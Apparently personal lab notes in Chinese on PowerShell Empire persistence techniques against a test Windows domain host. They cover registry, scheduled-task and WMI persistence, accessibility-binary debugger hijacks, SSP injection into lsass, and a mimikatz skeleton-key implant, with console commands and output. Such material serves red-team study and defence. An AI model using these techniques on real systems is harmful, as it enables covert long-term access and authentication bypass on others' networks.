這是緊接著上一步

elevated——權(quán)限維持

注冊表

(Empire: powershell/persistence/elevated/registry) > set Listener test
(Empire: powershell/persistence/elevated/registry) > execute
[>] Module is not opsec safe, run? [y/N] y
(Empire: powershell/persistence/elevated/registry) > 
Registry persistence established using listener test stored in HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Debug.

因?yàn)槭情_機(jī)啟動，所以會彈個黑框

計(jì)劃任務(wù)schtasks

(Empire: powershell/persistence/elevated/schtasks) > set Listener test
(Empire: powershell/persistence/elevated/schtasks) > execute
[>] Module is not opsec safe, run? [y/N] y
(Empire: powershell/persistence/elevated/schtasks) > 
成功: 成功創(chuàng)建計(jì)劃任務(wù) "Updater"。
Schtasks persistence established using listener test stored in HKLM:\Software\Microsoft\Network\debug with Updater daily trigger at 09:00.

wmi

(Empire: powershell/persistence/elevated/wmi) > set Listener test
(Empire: powershell/persistence/elevated/wmi) > execute
[>] Module is not opsec safe, run? [y/N] y
(Empire: powershell/persistence/elevated/wmi) > 
WMI persistence established using listener test with OnStartup WMI subsubscription trigger.

查看的方法參考

運(yùn)行結(jié)果

第一個很明顯是注冊表的，后兩者都提權(quán)為system權(quán)限了

(Empire: FZUB5V31) > agents

[*] Active agents:

  Name            Lang  Internal IP     Machine Name    Username            Process             Delay    Last Seen
  ---------       ----  -----------     ------------    ---------           -------             -----    --------------------
  FZUB5V31        ps    1.1.1.11        WIN-EGQU692VVEO *TEST\Administrator powershell/2736     5/0.0    2017-08-18 10:28:13
  E1MPZRLB        ps    1.1.1.11        WIN-EGQU692VVEO *TEST\SYSTEM        powershell/3624     5/0.0    2017-08-18 10:28:15
  NY76AGRX        ps    1.1.1.11        WIN-EGQU692VVEO *TEST\SYSTEM        powershell/740      5/0.0    2017-08-18 10:28:14

PowerBreach

deaduser刪除指定賬戶時觸發(fā)執(zhí)行
eventlog定時查看事件日志，當(dāng)有指定值如Hack時觸發(fā)，需要管理員權(quán)限執(zhí)行
resolver定時解析域名，當(dāng)滿足指定ip時觸發(fā)

UserLand

顧名思義用戶登陸時觸發(fā)。registry schtasks跟前面的重復(fù)，backdoor_lnk是構(gòu)造一個特殊的快捷方式。（但是設(shè)置C:\test.LNK并沒有發(fā)現(xiàn)生成成功）

Misc

add_sid_history：調(diào)用Mimikatz的misc::addsid，結(jié)果ERROR mimikatz_doLocal ; "addsid" command of "misc" module not found !
debugger ：給sethc.exe, Utilman.exe, osk.exe, Narrator.exe, or Magnify.exe添加debugger
disable_machine_acct_change: 禁用必須修改密碼的策略

ssp

Security Support Provider，直譯為安全支持提供者，又名Security Package.
簡單的理解為SSP就是一個DLL，用來實(shí)現(xiàn)身份認(rèn)證，例如：

NTLM
Kerberos
Negotiate
Secure Channel (Schannel)
Digest
Credential (CredSSP)

SSPI： Security Support Provider Interface，直譯為安全支持提供程序接口，是Windows系統(tǒng)在執(zhí)行認(rèn)證操作所使用的API。 簡單的理解為SSPI是SSP的API接口
LSA： Local Security Authority，用于身份認(rèn)證，常見進(jìn)程為lsass.exe
特別的地方在于LSA是可擴(kuò)展的，在系統(tǒng)啟動的時候SSP會被加載到進(jìn)程lsass.exe中.
這相當(dāng)于我們可以自定義一個dll，在系統(tǒng)啟動的時候被加載到進(jìn)程lsass.exe！
get_ssp查看當(dāng)前的ssp列表。
install_ssp允許你安裝指定dll。
memssp會記錄所有的認(rèn)證事件到C:\Windows\System32\mimisla.log.Should be reboot persistent.
實(shí)際測試根本就沒有生成那個log文件，操作系統(tǒng)2008 R2 x64。

skeleton_key

(Empire: powershell/persistence/misc/skeleton_key) > 
Job started: C175UZ
Hostname: WIN-EGQU692VVEO.test.com / authority\system-authority\system
  .#####.   mimikatz 2.1 (x64) built on Dec 11 2016 18:05:17
 .## ^ ##.  "A La Vie, A L'Amour"
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                     with 20 modules * * */
mimikatz(powershell) # misc::skeleton
[KDC] data
[KDC] struct
[KDC] keys patch OK
[RC4] functions
[RC4] init patch OK
[RC4] decrypt patch OK

Skeleton key implanted. Use password 'mimikatz' for access.

親測可用，任意用戶名加上密碼mimikatz就能登陸。